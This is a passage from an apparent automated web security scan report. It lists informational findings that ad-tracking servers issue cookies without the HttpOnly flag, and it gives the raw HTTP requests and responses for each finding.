hGeNZfdQa6KWZJbHpsiIPOCcIXMd7rRsTytymDxbBcSdJSOF12B9Pjw5Zd4nETw83mqHLJNXb+avDtVTPJTZvtMw/WF863sU5PyifACD+WfVm7plRes9cpmKCPcJQ7KvRISbVPTZwwZPbZ+ibDRrmqQ75C3n12yoLgcMTFwwpUXIE8ayLlistW77NupnYkEPzdtEpAoN9Gh3vRGfHy0oQz19wzUQqJlA28pDJ1tX/7iOBCPg6ZY5H+poLDVjrVtXfWnmVV69M+2ceRBwsL9kP8Sh4kd0vsFLne73RkEScWjpHV7/ppEg88FcDKahaMhEZyiRDsKA570XuyQw+UqP5VTXr4GySHBYP6zLT3+/tCziDDi6NClG6rdihdMlrm4QYe4xpq3GPbtAWr82gHnL3YXN2W2EYYdhilT+MNpndsp7h20igjE/HbpSLspAok9tNFXqbEYlOwELgS+lv9Ifkr2X+d0pgrqiQQ0d9l6fgzE+vTxRX/lSqhrDbZ8AP5hPvWP8yU2CWGjyJOp+IQMzxLbCeyMUCOswZyF9Szp3O3Ji1sOZtE3XxCc0gQdRJoaas/cK6jDrj+Zn0IMRafowVEGLGJ68i+1GuK1MUVVnvoLFt0mEIVuYfpXQ0Ox3EP6fd4MwQt7ZSlCzlXGh+Uyu5r2kFhlZQi9L/2q/8uNAomOxLyyaFNZVc6DYQZk9rPmOUl/1BLQsf1hbETMCwzqBObuJhhJm/LMoMBrGq/Uo14rgZ/IiEUZxD2wQsnkg4zyIS9BU59fSAJXFKHCXXf9N00ud61sG4DWv4Y9jKKolUZ0s/uTUq3gugjF+d; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:17 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:17 GMT
Content-Length: 939

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','J06575_10245','J06575_10396','D08734_72078','J06575_50073','J06575_50240','J06575_50735','J06575_50807','J06575_50822'];
...[SNIP]...

11.47. http://pix04.revsci.net/J06575/b3/0/3/1003161/807655569.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1003161/807655569.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1003161/807655569.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP140+huHIQDruItGF29/z0a0qdLOaaQnczyWBW6QQ4O3XYuv0liDtqNncA2iFgLyKdDKURNw+S7oQxbOYTHYrKZ2dbvcV56gmyoyU4a2CMf5ovXdEZFcE017Ryqk+7nNFKUlIhPaZaEjzyv5uobKDuejN4W8yhWG/DFPY+M9w2cuecXe9PcpFr0MiJx9yLdq6TTyhSv6PuviC0MN4iKZDkVHzeHcIGMiXdci2bVc4S1cz+9VDmjLExI7RS7MGqqNuya1ss6T2bFacwQP85FS+V6wTdARcJAef2gmv/VTj3x5h4uUd2KuNYX6aHXuiT3h3m8CKB/0AOk9wWBNVPUfegcRyuqIopqk6aDacDhIWbYpka4KxJ5Au6n749iv1R7xCtAEW1joHLhacGq2erlzGy658wn63U+JplcyWh3kMaEJqXxWY+ROvlqSuqXjsCC0qjB/NDXEwTNTA9ZnxJBAIC2mnOSncbDfyTxRILJj3BJHbs5qr7TOO/HZNWacPaSHHs92dfHkKBwBMygq1CPNLMNqgAn9aHt0Xd5asOlVgQ+wMvZGsvN+IiS/oMSjLfugorj+hpz4sT/aI=; rtc_gNkk=MLvn9jM1Jgpr54aeFy58YLrc3TPJXKuUhF+WKpWQ6BT9vtIMiLEgfriSIH+6oN7+gF9hY+HDTba4RTjzA519wkRHZcOAJEo4DQzt2Om/hARoMTcLYKE4b9Mk3IyFloX4lVi/0zObRRfG/BqiXqBUCsu9DR7K8008eZg4eQFvS5MzWThlk8WWNcoC9XDBsIaSi9nd4TH7BLUfaDl5nZIqlDBCeZfsq5IrZg73tkP4E2yiMsBY+NuBZX/1qeiF34a22ee6sDUKIxVpAmcv4nhe0LXvJDdS4iC9TldQnJlW761Iu9PGbayZw9MbzArkTKcIpHM8E+Os9AEPY7O6oRLRFFyxBRbtX2QSKiWNR4VoM+1FCrFdKyVCKiEd38QdLXcycGkOqfOJf5mxNMKGG/62UDrXysoExPPPkaHRyNEHI4ONCijKQeNg4Tprvy8xiEFwV7pUk55r0Uf1rdz5sbPL7rDAOQlrKYryCdPj5wFP0f++d1twsfNbWi2huPm8m9HwoNU954aVSLkceBGu9dZOOeetxqPewEdPxHyIsSaGmEvexjPrrTASD7QsT02gWWSHW6XI18VbNNmdwjIzFNi9N/mKv/c2e8XGnbl1ez0CVJlIRwDHnpB5xxpxtuaL0vbsvZRbeDRddVgKA0cJZNJD8DDM7rUBqzYYszdunVBZVxY0glO22UJOzGb/NDQu0BGtbZfxBLGNlTiP9AO2CFcUcKHFmIJAx1JvsBzyrM313xt+ttLSnlFFRcq7AIRyDyp+Fi3Ya4huqfx/m2rVBVeIPWWLZl9/uf1fJxiZUh24CF0po6s/LTg86FUZaYZX0mjFKIpDqS5VJRc3jo7RApI74eEZL1xDHCxCze1ohFq8jgKcdbQI0CevEfWbM5FfaReCoyHlCaobvF0GYEKHQr2V9hnv35BhxzEI25L5lfm77cKyt8xfrmiQHYpQRzApKVFb3YTmHMKZFZJ64J6V6dDZp+G3p21fv6Dtj/0ZO9hXpY2vSIg/P30WadGL5q4VYNVErOo9p1L3F5Ybowv7Kmvxa0p/j7UyrpFwLWGddArBKxiAY/TVYJh/JMQugWKt3nlJuinIfJ8GKIUGE0jyIIf3iFRaCfSGcDPYJdB8BT/JXEMxKRqqS6DypKcvjzS/tBZUwiCAJFx/9EyC7Y87mcVjmsr+3GbkMQQmeaMgxD0jmFUuKkH02ny91Jb5+VtUPGmjNrdl2KGe9TtIAY3t0ofHQrz6otIYD8qi8HUiWJmdRBsAS6wZPWrTrxM8m8vRALbZxPLLa/Lw/YlHTsMwQ3CyMzERhkgwh7Nwh+Ff3K6N0wPsQRrFWrKJr/04MNRKN8eEmpJxELGcZgeCELAurmuXmhOrwANWiFr6Y5D+Nzh7XaZ5QAjjEHnPx/yzNVRCoPQCBeMc063urg5UAbQDdyBdbr8brehaHtwit48XrkXPxYVmgHeTZBZElWHgm84RIXxtS3oPYdhov2zAM5MjoZfz0kW/1QnUeIEHrIYojONHEGCFUYZbk9fgVO477YrqJm74Ild5/OnZXA5njF+ln1ytVEFTrBYq0oDHk8Ba5wiiEL065y18CXWfM8ucXNv9fbeZ2ooHI8QbxxoTx/uHwt2wpal+Xn30BUwfUt1JmeHJrpCyyzX4qN30Yd9DcYhQ6W47GnbjBcuu+pe+jx1T6sX7nRsFsziOctAgDKvHI0SVIrepM0q5rVA1gwIFolJeC0LGuOJPX6oSxwxzfvFYmR6e0G+eB+TIU0fkTsktG1e7YEC3Z5S3wAzn3TEOymS/ajl80qxtQbfDmRUKB5ZgYZDEQchUlMTjKwzUlZbzvODGAoDkHcyd5gATArIYcBJOivK2FGlFtWBaJQKi/5GQkLoXm9K9n5dvcxVPSw==; udm_0=MLv39CEJZjpv597JwPKJxC5gZVtCsylMowZVqFba93uE88QpuDb5ZC9UQMpBwKgJsgsK/5y/VyTHjCWG4SoGRm5dWoFU7PHkVBVRsmPo8ulpSziaGfT5EodlaMm+vF2r3l/c95LrsITXHJ2I1zqJbIwuKe5PN2KgWbN8mNcvi/u7eq2U+HGkHowc+nxezhSslqi3VLe86ut3/CbD7ii3elUpunmujKWIZxPJ9ltUcyTIwhrqdTnfK90aiYPaKzaUqqi1CDohU8VolCkQ/PbXsT0D64lEj1zTEx0fYZK083py+2GEeADpri0HRNaxF300KQuDjQ6yz58+/gEwpcHSlXrUjeL+Q+A2KWMxSaXE3vLUGnK762eDMdGneRi4Z5R/PDaDROL3MikWyJfZq3hJmDPIcsKjZ7WKze1UFa9+VR6Daqv9+IX/j69KWQiiGHN62ZLnTvJDkw/+LGzEdm+xrncZe/MTLl/tzGbC6OZ0xyhOwOxLvpW4OEBvo1vFPZqQ8/4dUIZ9c/tMlDDqcpEk6cZrfGczZNcJ07uJ6oe4iZsjKWewFYiQsK/rbrMrdrfQ/1Su1smIgKxV/Y7oSQzXAjnycWIGfDTAndbGihpi8nFzveXcTFNP5ap414bqma34KoXwzYOq2sc7L4a4qOCmcRiLxjHOc0PPPoNmxhfMWndLuIWTqiOZ4fC0D3IIa7verqW/TDSuCVZ4/orK2q93e17LqkrpOdscw4BbMow6IH7X1OwrXgdjH2/vC9ieEfItiNwQm/uKzk/rnEcVobls6XLls68BM8P9BLC9CTJ6FW1a2w9AOYL2XuoVlnxrjqQPEq4TJtb4mppTU9JrmC9dDEMVwLVNX2aP+Qizf0csOzMy1yU7/fW8h2V1Fh2MeGTjho24iDQqgz4BHQnU7cajGik/56FuARVHL/klg+jUrgSyRsWErWs4tagMBICsdSAiN4tHzJKNsWD1RNYyM2mz7OtgN34QjNO13raQh9KK+UWgc5rtxG0dJuMCoIB4X/hheL8GjEwr+reg/R3m7iuStF0nM5KEJf8qN3Jd3KNrW29NASW0ZNG8TRP3WpdNC1EXEgHYHAjK5b8qNIxRpUqD7btnu/7mzW1a5L/HqPfjtu2qmBWPXPU0k8BdOhAlQGKzABVcTeH7d4Na8CZMdKgNzi52xXhAHqzGYP6Jv3XrXlkJmmp8JzGb+Gmv13RIc2KjMZHqcXB+aXLsPdbwjNmb9lJ2+oUGpQZgH12jfK8uKuHOnVxIzQbugywkDX47CIxRV5y+bCwKY89nBay4+AXw/XyremaQ19e7j9A65Xeqz8nK6eezLWs2STWqnAYxnLskLHMzo52qf22tCqcGXq7CGYNR5tfPHBaQhbi8L0bj1ToQM3w0EEhFavgGW8SLtdUODbZFMwPPZ9LSkHDkpM0wf0Hxef3U9E+m2XvWGHg3cU92f5el+wGICUvGb+KsKCaxvvG7KIz2Thse+5WRvmy6IkCYwqk9KHBsTqashxrqRTPDf+cLSf8Y3dw=; rsiPus_GcbX="MLsXrqEO5ihr4JB0esFCP3iNF+pqmr69ENWrChMuiN+dmZss5tWSaGYzfZrs4FkB8vHaExBOdq4FjNOXBUu39W/3K2EuxA2rLiiq5uEzbhBp2qqHLka+ldHHpySEQN7Ig6ZX2s1Xts6k3/V+F1BVNaX7P2AMt0j6s7SVkIqtY6fBmuqDg3HiDPDRsFu8LYGpdAgFuZrn7788WLSfiPN4FcsWpCManqMes4eDphzgluz0J7T/7NL09GWQZKgq0h2UqnrAalLP4GpQ2z6NoJmqhjf8ll+bI1mb+2NJpMp3lsbhQW6smYNRkIcBnGSsjC6V8lHV22qN0wsd7pUjrGcn2MZyDk4pHLi3HPlqzfwOFLKkUZX5pylobtQ4XT7CPkVynIhqs2Jdqx6Qbv+DVlcJEcLKaGs26CcQXDhIjPrjQmHNTw104A6YB2yPj9aadbsR9G2g+Sx1IMWC03cSleVUYqmsonOsNwBq4IYZ0iEAxN1kj79GMm/TFvViob6tBGl9piggG1ojpl++EI4CZ/DO72bnJ5uiK6A+hD9jowvMcmzWV7pm2A+BZXOctz9mBcFlA1NhVrVlT54nZulBkGghmR6LfWnx7wRhTDuJYLIL9CjgkLULZ5OwAnDvGtd8c9/IcoSF7rvvCCwxXrXbNkbJA5UJXZiQQ32aGD42CB8j4Uuicv5NhrCu90msLuL0yXPFEkF+ghJXl4UoCPpQReyKPwLxU7P8scUESOUmDQbJ26zmYoM5EYK5HRM13xlFLDjmN3gr3gzLy3PBXRfK/0inM3mgODaJYIQsP4tG3dxQXtc5BzlJZExi106qBh3X8ZgtVrG+Lsw/MFccxeVYnXDkPkatfVNHemuSBEnlJdlwJ7HaraMYTm4mdXxBXuNRVT1qtXz/N4fX76mCnHZapZ8HwTns8rRrVf85AMpSS1M+G68+RoH70ohcdXqH83XdOwulC23J/LnyGSVNe7uFY075AoD/k5/OVIoNr6nsjen9TP6PMT4mikP8tgoCsDB1P2MYAQIhWsgnQghE6D5W6j3EAllSXGbQxYfklk9PQ5HF/mqinW6N2HQc"; rsi_us_1000000="pUMVIzlHMAYY1A3HkAz1jyt3tlSj9WvRyFxc7CYdMac7y9zNu2VAbbuAi9eNwCUC8Wl4wOOguOEurHKK5ymr+WMVxLrjQRwI/BIpxOPADBg2yufgfgLgTu5j4fLTEQPVeuiSCftktrpjidSb3tKRT16/qhDddfs4YO14yGwo3mknI3Zsage7Hp/us89s/r8sHOwuTFP/CGJvF0CBpAcFUrFpcSeddZugAt2/rJIEsl5lFIWoWu0NxYgUpdu1epUcSWwK6nXWutDM3kjbS6MwxlDUEHsfiC/tX/ajBDdyf6FoclGT9hYvZ6yHELxTGV52+gM/KNJ7HFfCnqBSHyO9h6K2IG72DZG1gnriBn20N4unmsPk3dyDXHODxND8UIYEdTEJhqUeX0XH8ufbk9oKEcwKphMNOSzMjsdEazx5OG/X/voubSxcMfLggv+AZDDDoXbGHiM/jsG6UCatRfU6qwA/nFJ2HLM4H6Vwy6n5QW6iEtTBjhACVrgjSJ1n0sxNueMqqowm9U9MjFONHQUR6SKVk9owlMGLCJ812+Zr34276nVTgfXxsLZ0YiftaKJuIZ0xP8YY9WkMkt9n8RFkDTls6k1BC7v58lSYgZALXT+bKUXFsuSpAsJNWsLmyWs+XDUQmVb0hR/fcPrwgVJhI4ZuwOsX3RWEdg83luatgZ5+TKYM1It/I+VexFONR38x4qDP9iS3Y7dK1r0pZRdkAEwT968QaKX4dePJx+FsOolAvtn/m15h6VbBjCGtzXDFJsq0asZ+2cixyyycOZ0q9ZO0pv1gaqV+NlgOEwszeFk1G7zGPKs7Hn4CRU8RwJ3PC192d/zQh845eP57+B+obaWwyCioHG3FOYiiZ8MJGnrYDWOTh6FFkJ/lnooujf2FtYlU9jKpfaACfJAKJrmg0lUhzCxs3khsT9cbaSuhk/AIXUky6y/7/4/TdCE/G9rDhkcJMYJhTogOtss3qAESQMf2AR/2GXUB9mpl5kBSpRkjsPnWAmqvOIHRkFGc7ucL8rPj3ymJwl+PX2ItsAHmMq2EnmNyakB+vuFAuT9h5l25oI1IwUVAVoafxDxIVvNI3J0B6g0A1HzsmnY5z077NnItIJh3xRNWe/iXIU+CrYWmkPOTjLSuO4lfoF4riXFUJbckXujjUDMTlq5PEpGKQnlA56Zfg9qW912fdgXl6AA2hOYwMsuwUbGDBMFhQ6XfL09iRogg1WfYzxZ2Np6PvGSDERHaUwP8t0euXTq2Q3eSJ4ppXnS6iCAnGFPbCsrGjyRLOmYtFL2Im/UUecMgAjO9mIZcYqqjLobxUzRXN7iqDqCwIOmEyWQ0dYPcKR9laCXq+0nRJKCUAJQnStj+/JYwWMQHmQKF2Ca/hmc4+baAz6xM2NKxfNlISgW/KhdUaqQ38MUa0a1KSbc9v0K8egn0NfsoKiOYm7vbWfw20dVvNkxG4pyhchNYi+IfuzopLXmexn1k8T0TEIckb31ULLX5aO+Lk6yh9ODYCQQrLrxanBsN1+8zTf3vg5v7l3gwefT81PMYeXwyan8ecHtrQGmGtzs3pQzd"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_gNkk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP140+hOXIQDbuItGF29/xEGUv1FubrqCfUW+jA6QVisncWnhlMqxnmqlK+Gc1/8AbHoS/xi5YHLnczfPRUA3gJWSaDZaFmfmF0EbSDNmBG1fOmAegAqCklFjFRrtAdnSEyzOR2vkTJEi+F1N5+bQ/fd1erj8QlOab2cEor5jviZ97kXMiuRXOnB2UFV7/sZIcaURRKz7Uv9MDPT3lhtVcyP2xRVRyIB4psUdE3oZ1iEDeZKV4pqzK81Wyg7bymxhKB6G54ZssFJisgx/lNHy5uZFwrV5vzCX8a4Dq/3NhTt8bwuFaMfJuP686aPFmTV7jIjz8eqnHWAdhFw/vhq3tRF22lFOsWi2fik5Qs1ygvLlS/AAOJambdMKAxMze9oyjqdue5KVscRaaSTDBR39m2I6WGpJnYWoZPwOlbOq289rSmuxrvYkJOUvJ4nORGK5OA4MrlGrSkBzPLXgjMKYbLhlaLR9EzyZYjguS7YH1evU5W/7biSJhw8dNrcjfREGhQI8vP7himw/9oLG5wjurEMHM5qqesVXWTaHs2I5op7e8sn1oXTjw2vz5oUDUPn/XHNbt/PPPVr7OwRi48FzkovHuGO80YnTM=; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:36:48 GMT; Path=/
Set-Cookie: rtc_Siob=MLvn9jM1Jhpr5oaeFy5cQLrcDcgxJTbyaQGzwLZBotunayc2Fw/K4guEx48AnknPEndoby22cGHsdFck1iBn3DUobt55rCByo31GJyETeLJl0qvf6Jn2sxG2z0iT2bbcjJrHe8GBksW4qcll5AeaXjmGUDbRWU08YZg4edF2cBe9DspCxhQ7361ZfEotlSYP+MqBfL/w57DfCdIuJhyfxWDC+F4W0x32WtybJIRC8CLSlbxi3CC7anzdModTvAzrQfv7i4yJ4tfv23hElzRAo45NzalLx0pI92HjAlvLltXQMEeD59j8HSg5zMzrXkbxPGkDuQO8CD5Uy0X440+GhUuEBlTuXncKpo59or+teixmWGkw4h82xTsJxVA32RlmPlxfLd0DPboL+ScpDqJ7EyCMxiPZjPOZSZb/P18d0B6dPfXACkwW2b7JGqZgtJefS8MvIIRVOAWyGKSddY53IBjTDonVRQtAhow+gjBCkr32CoZhiC2o7W53iumA5JAaEKemP4CuriZ3Oh92wceTFssmiHV03P3TnzqwiMvWyGZOLcS0b36BgNTGDP/oHEgI419GHyNYPYePnsZhRU1jkIemN9OP89YbLzetkOaBNGBt72K+i32KTgFnJgkzRmDcwHADuX26Np6HbpwBpsafN0Td8Ege83IpcLfdCWoH/FOES7/sgvItqGMQtpNCesMiY1/hRPOhuADgEqQtp5XbMpu7Sw9desmqxa5M111GnRnmop62u913vIbogl+ZCoarCoWnW2EKAnaKevDI9CtQiAnPFAcM5XjabtRUvhL/d4fIh8imLNMmzGIfpvWHViSKdYGbIHfNIJWraMC4Vahh9asGqff/FFdlJKXDuHnrmiBy7VCK4q0bmyQiOi23Mbp4rMJ7ZFfExGjh0Deg21XrgVEJygAodlMrUFsYh3x+JL6tM82EyxlrjwnPSOPUficZAt2qOvCpWC4d70ONc6DbRXPel2qVWr9R4NR8spx21DQ329eEMe+a453iMV59kioeuCH7mnuTVCY0BzVfb8yQMpXNmGdq8018efv6cy0UrgNLG4Vvjwd577Jg6h+lwSUDxcDbZmAkDmKadjdnDBljgFfsyAsOrNyuDxbJ8TdkZR9gCAtjvsiBzxEVmOrYT6HzTeMLPHrrCPn/1PB0XdhHCeOuIM86Wd1eiYbwPVZOGYoxestkxrwvlBWmqS4zqiJgxGtklz6N9a8yWObB9QeQjynHLDznE3of6mhDRuDmkgGSe0nOe1faUBKdQj7BlaoONO99Gh3ocsQdQ6RyGiPqI42toAtkHfnwxlmtICBtRaKNsHXLNHetdA+4dp7vxXQ5tu/2hEFKF66SpSaQzQl8TB5m7kte9CE3/B32F347rQ4DCFhYj24E4ZyjUYbpe0M+kBzn/QykOyL/w0irDgy6ZQt/u+a1DUBqXRV0/AJO6NnbAxb2eDhLttfyzv258JjuenKMZ5xPt3XAFLN1oSvz6mF7fh50GXHUdoEQgkSBcZ1PS+wIfJy105Aol0wmkUqPh+kfoC4g82jad8JgHmsdZYx5FOIFhoBZb+snjaACRtXREaWla+3A8eufLP7nR7KLQvyYASC7SpnFhReJFBeehSPWU+4l2YWu2IunhD73tvQqrqM7UaWZW5R9IxXZ6BE+hyLrdBoYsxr5qgsF3QHqO2E6n0mUTNwl0lx9cFq7moVZ2JSzSIqGz8wv2TOVDrWCtgahQ4AuqpA7rev3wwCJJWC95V2UKuatoLe7dfcQ+Denb480wEG/t0RgjmDcYpnL90BoFiSV64XacUbSb6smN2yRmAHTsLTLO0QQnvg5vKkgJRJTsJ9hI4mqRmETR1BUZBdR48YLqpyeBqmK4NH5NH2LRq0bdNdk2U0gw4eAFmkAPgZUmniQzEOz; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:36:48 GMT; Path=/
Set-Cookie: NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf410&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 15:36:48 GMT; Path=/
X-Proc-ms: 7
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:47 GMT
Content-Length: 939

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','J06575_10245','J06575_10396','D08734_72078','J06575_50073','J06575_50240','J06575_50735','J06575_50807','J06575_50822'];
...[SNIP]...

11.48. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=408c9df8-85fe-6893-4938-ccbfd204601e&rtb=2724386019227846218 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=280&cb=2507990&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1304949602; i=02dd71c0-6aac-4019-82e3-049e51d96c25

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:12 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; expires=Wed, 08-May-2013 15:37:12 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.49. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=BUGCI3kAAAAAYm1CAEAA+DABAAAABAAAAIAA+DA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAno2C+ORAgA1G!; C2=foAyN5pqDIxFGekovMg3sYI7SKMCItdBwhQ3WXAcIsY4FAHC7opBwhA8NYAcI0eDGAHC6ijBwhgihXAcIsZ4FAHCv3gBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCqGeBwhAxBaAcIca4FAHCA9qBwhAuBaAcIYnXGAHCWGoBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIE0rGAHCNLqBwhgQvaAcIogmGAXtqOgGzaI71uKBhMrRYEZAEAazFEkZmjoxnG7IEwGlGjRj0jw+NX8bLiLBFAbhJV2KoaQUw6JBvHpxXVJ9EsuoGm0kQRANZX8Vs6OBBMnxXRrcEsNrGfVqHQwzeZ8VgCGBvCiBdPb1FQiqGuyovXw10Y4YRCsB7GdBM5a+GQ4kGm3sQZwSkaIho6vBh6lxK+5wGACHGJbt/fQl0aAEllOtGgUoWcQ3jYgRhy7BnrixHhpDHwyIGVyBcOqRlcQ82XUJpa0B1/lxTXIumN4CGASskgwbUaIRzaHCwTqxvN7NI0+oGAH; GUID=MTMwNDk1NTQyMzsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:38:12 GMT
